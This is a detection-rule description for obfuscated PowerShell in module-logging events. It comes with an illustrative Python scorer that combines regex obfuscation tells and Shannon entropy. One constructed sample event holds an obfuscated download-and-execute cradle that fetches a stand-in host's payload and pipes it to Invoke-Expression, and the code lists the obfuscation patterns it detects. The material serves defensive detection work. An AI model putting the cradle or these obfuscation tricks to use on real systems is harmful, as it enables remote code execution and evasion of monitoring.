
Summary
This detection rule identifies obfuscated PowerShell commands of the kind attackers use to hide what a command actually does. It monitors PowerShell module logging (event code 4103, written to the Microsoft-Windows-PowerShell/Operational log) for invocations of Invoke-Expression and Invoke-Command, and uses regular expressions to pull the invoked command text and the associated script name out of the event payload.

Several checks narrow the results. Commands that merely reference a script file by a common extension such as .ps1 are filtered out to reduce false positives; the remaining commands are tested for length and for specific patterns associated with known obfuscation techniques. The rule then supplements the pattern matches with the Shannon entropy of the command text as a measure of how scrambled it is, so a finding rests on several indicators rather than a single regex. The entropy calculation and related command analysis come from the URL Toolbox add-on (its ut_shannon macro supplies the Shannon entropy), so that app must be installed, and the search must be able to read both the PowerShell Operational log and the Windows event logs for the rule to work.

The rule helps uncover tradecraft seen in malware such as AsyncRAT and Midas, which rely on basic obfuscation to evade detection while keeping their command-and-control channels open.
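The following Python re-creates the detection steps described above over constructed 4103 records: extract the Invoke-Expression / Invoke-Command argument, filter script-file paths, require a minimum length, count obfuscation patterns, and compute Shannon entropy. It is an added illustration, not the rule's own SPL search and not code from the rule's maintainers; the regex set, the thresholds, the exact Payload layout (CommandInvocation / ParameterBinding lines) and the sample events are all assumptions made for this example, and plain math replaces the URL Toolbox ut_shannon macro.

```python
"""Illustrative scorer for PowerShell module-logging (event ID 4103) records.

Assumptions for this example: regexes, thresholds, the Payload line layout and
the sample events are invented here and are not the detection rule's search."""
import math
import re
from dataclasses import dataclass
from typing import List, Optional

# Only the two cmdlets that execute their argument are in scope.
INVOCATION_RE = re.compile(r"CommandInvocation\((Invoke-Expression|Invoke-Command)\)", re.I)
CMD_VALUE_RE = re.compile(
    r'ParameterBinding\((?:Invoke-Expression|Invoke-Command)\):\s*'
    r'name="(?:Command|ScriptBlock|FilePath)";\s*value="(?P<cmd>.*)"',
    re.I | re.S,
)
# A plain script path is the common benign case the rule filters out.
SCRIPT_FILE_RE = re.compile(r"\.(?:ps1|psm1|psd1)\b", re.I)

# Assumed obfuscation tells; each hit is one indicator, never a verdict alone.
OBFUSCATION_PATTERNS = {
    "backtick_in_token": re.compile(r"[A-Za-z]`[A-Za-z]"),        # I`E`X
    "format_operator": re.compile(r"\{\d+\}.*?\s-f\s", re.S),      # '{1}{0}' -f ...
    "string_concat": re.compile(r"['\"]\s*\+\s*['\"]"),             # 'Inv'+'oke'
    "char_cast": re.compile(r"\[char\]", re.I),                     # [char]73
    "join_or_reverse": re.compile(r"-join|\[array\]::Reverse", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
}
MIN_LENGTH = 40          # assumed: ignore short one-liners
ENTROPY_THRESHOLD = 4.2  # assumed: bits per character of the command text


@dataclass
class Verdict:
    command: str
    entropy: float
    patterns: List[str]
    flagged: bool
    reason: str


def shannon_entropy(text: str) -> float:
    """Shannon entropy in bits per character (0.0 for empty input)."""
    if not text:
        return 0.0
    n = len(text)
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def extract_command(payload: str) -> Optional[str]:
    """Return the argument handed to Invoke-Expression/Invoke-Command, else None."""
    if not INVOCATION_RE.search(payload):
        return None
    m = CMD_VALUE_RE.search(payload)
    return m.group("cmd") if m else None


def score_event(event: dict) -> Optional[Verdict]:
    """Apply the checks to one event; None means the event is out of scope."""
    if int(event.get("EventCode", 0)) != 4103:
        return None
    cmd = extract_command(event.get("Payload", ""))
    if cmd is None:
        return None
    entropy = shannon_entropy(cmd)
    hits = [name for name, rx in OBFUSCATION_PATTERNS.items() if rx.search(cmd)]
    if SCRIPT_FILE_RE.search(cmd):
        return Verdict(cmd, entropy, hits, False, "script file path (filtered)")
    if len(cmd) < MIN_LENGTH:
        return Verdict(cmd, entropy, hits, False, "command shorter than %d chars" % MIN_LENGTH)
    # Two independent tells, or one tell backed by high entropy, make a finding.
    flagged = len(hits) >= 2 or (len(hits) == 1 and entropy >= ENTROPY_THRESHOLD)
    reason = "patterns=%s entropy=%.2f" % (",".join(hits) or "none", entropy)
    return Verdict(cmd, entropy, hits, flagged, reason)


def run(events) -> List[Verdict]:
    return [v for v in (score_event(e) for e in events) if v is not None]


# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    {"EventCode": 4103, "Payload":
        'CommandInvocation(Invoke-Expression): "Invoke-Expression"\r\n'
        'ParameterBinding(Invoke-Expression): name="Command"; '
        'value="& (\'{1}{0}\' -f \'oke-WebRequest\',\'Inv\') -Uri (\'http://\'+\'198.51.100.7/stage\') | I`E`X"'},
    {"EventCode": 4103, "Payload":
        'CommandInvocation(Invoke-Expression): "Invoke-Expression"\r\n'
        'ParameterBinding(Invoke-Expression): name="Command"; '
        'value="Get-ChildItem -Path C:\\Windows\\Temp -Recurse | Measure-Object"'},
    {"EventCode": 4103, "Payload":
        'CommandInvocation(Invoke-Command): "Invoke-Command"\r\n'
        'ParameterBinding(Invoke-Command): name="FilePath"; value="C:\\Scripts\\Deploy-Agent.ps1"'},
    {"EventCode": 4104, "Payload": "Creating Scriptblock text (1 of 1): Get-Process"},
]

if __name__ == "__main__":
    for v in run(SAMPLE_EVENTS):
        print("FLAGGED" if v.flagged else "ok     ", v.reason, "|", v.command[:60])
```

The first sample trips three independent tells (format-operator reordering, string concatenation, backticks inside a token) and is flagged regardless of its entropy; the second is a long but ordinary command with no tells; the third is an Invoke-Command of a .ps1 path and is dropped by the extension filter; the 4104 record is out of scope. Any single pattern, the `-f` operator in particular, occurs in legitimate scripts, which is why the verdict requires corroboration from a second pattern or from entropy.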
Categories
- Windows
- Endpoint
Data Sources
- Process
- Application Log
- Windows Registry
ATT&CK Techniques
- T1027 (Obfuscated Files or Information)
- T1001 (Data Obfuscation)
Created: 2024-02-09